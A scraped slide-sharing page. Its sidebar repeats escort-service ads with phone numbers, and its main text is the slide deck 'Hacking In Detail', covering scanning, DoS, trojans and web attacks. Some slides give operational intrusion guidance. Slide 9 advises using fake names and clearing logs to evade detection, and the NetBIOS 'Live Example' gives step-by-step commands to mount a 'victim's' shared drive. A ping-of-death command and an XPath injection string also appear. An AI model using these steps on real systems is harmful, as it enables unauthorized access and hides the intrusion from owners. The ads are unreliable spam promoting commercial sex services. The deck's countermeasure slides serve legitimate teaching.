(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
Extrusion Processes and Their Limitations
Extrusion Processes and Their LimitationsExtrusion Processes and Their Limitations
Extrusion Processes and Their Limitations120cr0395
 
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxupamatechverse
 
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...roncy bisnoi
 

Último (20)

Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
 
OSVC_Meta-Data based Simulation Automation to overcome Verification Challenge...
OSVC_Meta-Data based Simulation Automation to overcome Verification Challenge...OSVC_Meta-Data based Simulation Automation to overcome Verification Challenge...
OSVC_Meta-Data based Simulation Automation to overcome Verification Challenge...
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
 
Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024
 
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur EscortsCall Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
Call Girls Service Nagpur Tanvi Call 7001035870 Meet With Nagpur Escorts
 
Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptx
 
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
 
VIP Call Girls Service Hitech City Hyderabad Call +91-8250192130
VIP Call Girls Service Hitech City Hyderabad Call +91-8250192130VIP Call Girls Service Hitech City Hyderabad Call +91-8250192130
VIP Call Girls Service Hitech City Hyderabad Call +91-8250192130
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
 
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By  Team Orange (Dept. of Pharmacy)Software Development Life Cycle By  Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
 
UNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its PerformanceUNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its Performance
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated  Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(PRIYA) Rajgurunagar Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
Extrusion Processes and Their Limitations
Extrusion Processes and Their LimitationsExtrusion Processes and Their Limitations
Extrusion Processes and Their Limitations
 
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
 
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptx
 
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
 

Hacking In Detail

  • 2. What is Hacking? Hacking refers to an array of activities which are done to intrude some one else’s personal information space so as to use it for malicious, unwanted purposes. Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
  • 3. A Brief History of Hacking  1980s - Cyberspace coined -414 arrested -Two hacker groups formed -2600 published  1990s -National Crackdown on hackers -Kevin Mitnick arrested -Microsoft’s NT operating system pierced
  • 4. A Brief History of Hacking  2001 – In one of the biggest denial-of-service attack, hackers launched attacks against eBay, Yahoo!, CNN.com., Amazon and others.  2007 – Bank hit by “biggest ever” hack. Swedish Bank, Nordea recorded nearly $1 Million has been stolen in three months from 250 customer account.
  • 5. Famous Hackers in History Ian Murphy Kevin Mitnick Johan Helsinguis Mark AbeneLinus Torvalds Robert Morris
  • 6. The Hacker Attitude  The world is full of fascinating problems waiting to be solved Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. To be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.  Nobody should ever have to solve a problem twice Creative brains are a valuable, limited resource. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
  • 7. The Hacker Attitude  Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work  Freedom is good Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by  Becoming a hacker will take intelligence, practice, dedication, and hard work.
  • 8. Basic Hacking Skills  Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer languages, you cant do hacking.  Get one of the open-source Unix's and learn to use and run it The single most important step any newbie can take towards acquiring hacker skills is to get a copy of Linux or one of the BSD-Unix’s, install it on a personal machine, and run it.  Learn how to use the World Wide Web and write HTML. To be worthwhile, your page must have content -- it must be interesting and/or useful to other hackers.
  • 9. Hacking Premeasured  When you start hacking the first thing you need to do is: to make sure the victim will not find out your real identity.  So hide your IP by masking it or using a anonymous proxy server. This is only effective when the victim has no knowledge about computers and internet. Organizations like the F.B.I, C.I.A and such will find you in no time, so beware !  The best thing to do is using a dialup connection that has a variable IP address. Be smart, when you signup for a internet dialup connection use a fake name and address.  When hacking never leave traces of your hacking attempts, clear log files and make sure you are not monitored. So use a good firewall that keeps out retaliation hacking attempts of your victim.
  • 10. IP Addresses  Every system connected to a network has a unique Internet Protocol (IP) Address which acts as its identity on that network.  An IP Address is a 32-bit address which is divided into four fields of 8-bits each. For Example, 203.94.35.12  All data sent or received by a system will be addressed from or to the system.  An attacker’s first step is to find out the IP Address of the target system.
  • 11. IP Addresses: Finding out an IP Address  A remote IP Address can easily be found out by any of the following methods: Through Instant Messaging Software Through Internet Relay Chat Through Your website Through Email Headers
  • 12. Finding an IP Address via Instant Messengers  Case: If you are chatting on messengers like MSN, YAHOO etc. then the following indirect connection exists between your system and your friend’s system: Your System------Chat Server---- Friend’s System Friend’s System---------Chat Server------- Your System Thus in this case, you first have to establish a direct connection with your friend’s computer by either sending him a file or by using the call feature. Then, goto MSDOS or the command line and type: C:>netstat -n This command will give you the IP Address of your friend’s computer.
  • 13. Finding an IP Address via Instant Messengers Countermeasures Do not accept File transfers or calls from unknown people Chat online only after logging on through a Proxy Server. A Proxy Server acts as a buffer between you and the un-trusted network known as the Internet, hence protecting your identity. Case: Your System-----Proxy------Chat Server------Friend’s System Some good Proxy Servers are: Wingate (For Windows Platform) Squid (For Unix Platforms)
  • 14. Finding an IP Address via your website  One can easily log the IP Addresses of all visitors to their website by using simply JAVA applets or JavaScript code. Countermeasures  One should surf the Internet through a Proxy Server.  One can also make use of the numerous Free Anonymous Surfing Proxy Services. For Example, www.anonymizer.com
  • 15. Finding an IP Address via Email Headers  Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email.  A Typical excerpt of such a Header of an email sent from a Hotmail account is: Return-Path: <XXX@hotmail.com> Received: from hotmail.com by sbcglobal.net (8.9.1/1.1.20.3/13Oct08-0620AM) id TAA0000032714; Sun, 12 OCT 2008 19:02:21 +0530 (CST) Message-ID: <20000123133014.34531.qmail@hotmail.com> Received: from 202.54.109.174 by www.hotmail.com with HTTP;Sun, Sun, 12 OCT 2008 05:30:14 PST X-Originating-IP: [202.xx.109.174]
  • 16. IP Addresses: Dangers & Concerns Dangers & Concerns  DOS Attacks  Disconnect from the Internet  Trojans Exploitation  Geographical Information  File Sharing Exploits
  • 18. General Hacking Methods  A typical attacker works in the following manner: 1. Identify the target system. 2. Gathering Information on the target system. 3. Finding a possible loophole in the target system. 4. Exploiting this loophole using exploit code. 5. Removing all traces from the log files and escaping without a trace.
  • 19. Port Scanning: An Introduction Port Scanning means to scan the target system in order to get a list of open ports (i.e. ports listening for connections) and services running on these open ports. Port Scanning is normally the first step that an attacker undertakes. Is used to get a list of open ports, services and the Operating System running on the target system. Can be performed easily by using different methods. Manual Port Scanning can be performed using the famous ‘Telnet’ program. It is often the first tell tale sign, that gives an attacker away to the system administrator.
  • 20. Port Scanning : TCP Connect Scanning  Port Scanner establishes a full 3-way TCPIP Handshake with all ports on the remote system. The regular 3-way TCPIP Handshake has been depicted below: 1. Client---------SYN Packet------------- Host 2. Host-----------SYNACK Packet-------- Client 3. Client----------ACK Packet--------------- Host  Accurate and Fastest Port Scanning Method. Detection and Countermeasures  Initialization and Termination of Connections on multiple ports from the same remote IP Address.  Only monitoring can be done. No effective countermeasure available, without compromising on the services offered by the system.
  • 21. Port Scanning: Security Threats Port Scanning is commonly used by computer attackers to get the following information about the target system: List of Open Ports Services Running Exact Names and Versions of all the Services or Daemons. Operating System name and version All this information can collectively prove to be invaluable when the attacker is actually trying to infiltrate into the target system.
  • 22. Port Scanning : Major Tools Available Some of the best and the most commonly used Port Scanners are:  Nmap  Superscan  Hping Common Features of all above Port Scanners:  Very Easy to Use  Display Detailed Results The easy usability and the detailed information reports generated by popular port scanners has led to an alarming increase in the number of script kiddies.
  • 23. Port Scanning: Counter-Attacks Strategies Although, it is impossible to stop clients from Port Scanning your network, however, it is advisable to take all possible measures against possible attackers. Some useful Anti-Port Scanning software available are:  Scanlogd (A Unix based Port Scan Detector & Logger)  BlackICE (A Windows based Port Scan Detector & Logger)  Snort: A packet sniffer cum IDS.  Abacus Port sentry: Capable of Detecting both normal and stealth port scanning attempts. Other than the above tools, it is always advisable to disable as many services as possible. In other words, one should try to close as many ports as possible, without compromising on the services offered by that system.
  • 24. ICMP Scanning: An Introduction  The Internet Control Message Protocol (ICMP) is the protocol used for reporting errors that might have occurred while transferring data packets over networks  Extremely Useful in Information Gathering.  Originally, designed for network diagnosis and to find out as to what went wrong in the data communication.  Can be used to find out the following:  Host Detection  Operating System Information  Network Topography Information  Firewall Detection
  • 25. ICMP Scanning: Host Detection Techniques  ICMP Host Detection technique ‘ping’ command or utility.  The ‘ping’ utility can be used to determine whether the remote host is alive or not.  The ping command can be used by the attacker for the following purposes:  Host Detection Purposes  To clog up valuable network resources by sending infinite ‘Echo request’ ICMP messages.  Firewall detection
  • 26. ICMP Scanning: Host Detection---Ping Example  Below is sample output of a PING command executed on a Windows machine: C:WINDOWS>ping www.yahoo.com   Pinging www.yahoo-ht3.akadns.net [69.147.96.15] with 32 bytes of data:   Reply from 69.147.96.15 : bytes=32 time=163ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=185ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=153ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=129ms TTL=61 ……………
  • 27. Various Types of Attacks There are an endless number of attacks, which a system administrator has to protect his system from. However, the most common ones are:  Denial of Services attacks (DOS Attacks)  Threat from Sniffing and Key Logging  Trojan Attacks  IP Spoofing  Buffer Overflows  All other types of Attacks
  • 28. Denial of Services (DOS) Attacks DOS Attacks are aimed at denying valid, legitimate Internet and Network users access to the services offered by the target system. In other words, a DOS attack is one in which you clog up so much memory on the target system that it cannot serve legitimate users. There are numerous types of Denial of Services Attacks or DOS Attacks.
  • 29. DOS Attacks: Ping of Death Attack The maximum packet size allowed to be transmitted by TCPIP on a network is 65 536 bytes. In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCPIP, is sent to the target system. As soon as the target system receives a packet exceeding the allowable size, then it crashes, reboots or hangs. This attack can easily be executed by the ‘ping’ command as follows: ping -l 65540 hostname
  • 30. DOS Attacks: SMURF Attacks  In SMURF Attacks, a huge number of Ping Requests are sent to the Target system, using Spoofed IP Addresses from within the target network.  Due to infinite loops thus generated and due to the large number of Ping Requests, the target system will crash, restart or hang up.
  • 31. Threats from Sniffers and Key Loggers  Sniffers: capture all data packets being sent across the network in the raw form. Commonly Used for:  Traffic Monitoring  Network Trouble shooting  Gathering Information on Attacker.  For stealing company Secrets and sensitive data.  Commonly Available Sniffers  tcpdump  Ethereal  Dsniff
  • 32. Threats from Sniffers: Working & Countermeasures  Working Sniffers work along with the NIC, capturing all data packets in range of the compromised system.  Countermeasures  Switch to Switching Networks. (Only the packets meant for that particular host reach the NIC)  Use Encryption Standards like SSL, SSH, IPSec.
  • 33. Threats from Key Loggers  Key loggers: Record all keystrokes made on that system and store them in a log file, which can later automatically be emailed to the attacker.  Countermeasures  Periodic Detection practices should be made mandatory. A Typical Key Logger automatically loads itself into the memory, each time the computer boots.  Thus, the start up script of the Key Logger should be removed.
  • 34. Trojan Attacks  Trojans: act as a RAT or Remote Administration Tool, which allow remote control and remote access to the attacker. Working: 1. The Server Part of the Trojan is installed on the target system through trickery or disguise. 2. This server part listens on a predefined port for connections. 3. The attacker connects to this Server Part using the Client part of the Trojan on the predefined port number. 4. Once this is done, the attacker has complete control over the target system.
  • 35. Trojan Attacks: Detection and Countermeasures  Detection & Countermeasures  Port Scan your own system regularly.  If you find a irregular port open, on which you usually do not have a service running, then your system might have a Trojan installed.  One can remove a Trojan using any normal Anti-Virus Software.
  • 36. Live Example Hacking NetBIOS What is NetBIOS? NetBIOS (Network Basic Input/output System) was originally developed by IBM as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for acessing networking services. Step 1: Get a IP (range) scanner. (Recommended Superscanner). Scan the victim's IP on TCP/IP port 139.
  • 37. Live Example Hacking NetBIOS: Continue  Step 2: Open a DOS prompt. Go to Start-> Run. Type CMD and press OK. This is what you see: c:windows> This is what you need to type down: Replace 255.255.255.255 with the victims IP address. c:windows>nbtstat -a 255.255.255.255
  • 38. Live Example Hacking NetBIOS: Continue  Step 2: Continue If you see this, you are in: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------------------------- User <00> UNIQUE Registered Workgroup <00> GROUP Registered User <03> UNIQUE Registered User <20> UNIQUE Registered MAC Address = xx-xx-xx-xx-xx-xx If you don't get the number <20>. The victim disabled the File And Printer Sharing, find a another victim
  • 39. Live Example Hacking NetBIOS: Continue Step 3: Type down: c:windows>net view 255.255.255.255 If the output is like this: Shared resources at 255.255.255.255 ComputerNameGoesHere Share name Type Used as Comment ------------------------------------------------------------ CDISK Disk xxxxx xxxxx The command completed successfully. "DISK" shows that the victim is sharing a Disk named as CDISK
  • 40. Live Example Hacking NetBIOS: Continue Step 4: Type down: You can replace x: by anything letter you want but not your own drive letters. CDISK is the name of the shared hard drive. c:windows>net use x: 255.255.255.255CDISK If the command is successful we will get the confirmation. The command was completed successfully Now open windows explorer or just double click on the My Computer icon on your desktop and you will see a new network drive X:> . Now your are a small time hacker. Good luck.
  • 42. Internet Application Hacking Statistics  WHID (Web Hacking Incident Database) annual report for 2007 67% percent of the attacks in 2007 were "for profit" motivated. And it targeted the Web-Applications.  Acunetix, a leading vendor of web application security solutions, revealed that on average 70% of websites are at serious and immediate risk of being hacked. Every 1500 lines of code has one security vulnerability. (IBM LABS)  3 out of 4 websites are Vulnerable to attack. (Gartner Report)  Most popular attacks are against web server ( incident.org)
  • 43. Why So Many Attacks on Web Application???  Mobile Application, Browser Application.  Internet data is shared.  24 / 7
  • 44. Web Application are Three-tier Application Three-tier application
  • 46. General Hacking Methods  A typical attacker works in the following manner: 1. Identify the target system. 2. Gathering Information on the target system. 3. Finding a possible loophole in the target system. 4. Exploiting this loophole using exploit code. 5. Removing all traces from the log files and escaping without a trace.
  • 47. Fundamental Methodology to do any Web-Application Assessment  Foot printing Discovery of Web application  Profiling  Getting Real Attack Points  Exploit the system  Finding the defend mechanism and approach for them
  • 48. Start With Foot Printing  IP Address and Port as start point for assessment- MYTH  What if IP address is multi-hosted?  One IP can have more application to assess.  Finding web application running on domain.  HOW????
  • 49. 2-Ways  Host Foot printing  Domain Foot printing.  Both focus on Web application.  Tools and method.  LETS CHECK IT OUT!!!!!
  • 51. Web-Application Attributes  Query String  Javascript  Cookie script  Path to cgi-bin  Others
  • 52. Why Vulnerable?  Poor Web Application coding  Insecure deployment of web application  Insufficient input validation  No web traffic filtering  Web application attributes are not guarded well. For example Query String.
  • 55. Checking Vulnerabilities  http://www.acunetix.com/cross-site-scripting/Copy-scanner.htm  Once you have vulnerabilities known, Out of the 100,000 websites scanned by Acunetix WVS, 42% were found to be vulnerable to Cross Site Scripting. XSS is extremely dangerous and the number of the attacks is on the rise. Hackers are manipulating these vulnerabilities to steal organizations’ sensitive data. Can you afford to be next?  Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data
  • 56. Classes of Attacks  Authentication The Authentication section covers attacks that target a web site's method of validating the identity of a user, service or application.  Authorization The Authorization section covers attacks that target a web site's method of determining if a user, service, or application has the necessary permissions to perform a requested action.  Client-side Attacks The Client-side Attacks section focuses on the abuse or exploitation of a web site's users.  Command Execution The Command Execution section covers attacks designed to execute remote commands on the web site. All web sites utilize user-supplied input to fulfill requests.  Logical Attacks The Logical Attacks section focuses on the abuse or exploitation of a web application's logic flow.
  • 57. Attack Techniques (Hacking Techniques)  Brute Force A Brute Force attack is an automated process of trial and error used to guess a person's username, password, credit- card number or cryptographic key • Cross-site Scripting Cross-site Scripting (XSS) is an attack technique that forces a web site to echo attacker-supplied executable code, which loads in a user's browser. • SQL Injection SQL Injection is an attack technique used to exploit web sites that construct SQL statements from user-supplied input. • XPath Injection XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
  • 58. XPath Injection <?xml version="1.0" encoding="utf-8" ?> <orders> <customer id="1"> <name>Bob Smith</name> <email> bob.smith@bobsmithinc.com </email> <creditcard>1234567812345678</creditcard> <order> <item> <quantity>1</quantity> <price>10.00</price> <name>Sprocket</name> </item> <item> <quantity>2</quantity> <price>9.00</price> <name>Cog</name> </item> </order> </customer> ... </orders>
  • 59. XPath Query of Previous Code  The XPath query that the application performs looks like this string query = "/orders/customer[@id='" + customerId + "']/order/item[price >= '" + priceFilter + "']";
  • 60. Hacking XPath Injection Query string query = "/orders/customer[@id=''] | /* | /foo[bar='']/order/item[price >= '" + priceFilter + "']";
  • 63. QUESTIONS FOR EXAMS Q) Discuss general hacking method? Ans:  Identify the target system.  Gathering Information on the target system.  Finding a possible loophole in the target system.  Exploiting this loophole using exploit code.  Removing all traces from the log files and escaping without a trace Q) If we have IP address and a port, we can do web assessment for all web application. (Agree/Disagree) Give Reason. Ans: Disagree What if IP is hosted in multi-hosted framework?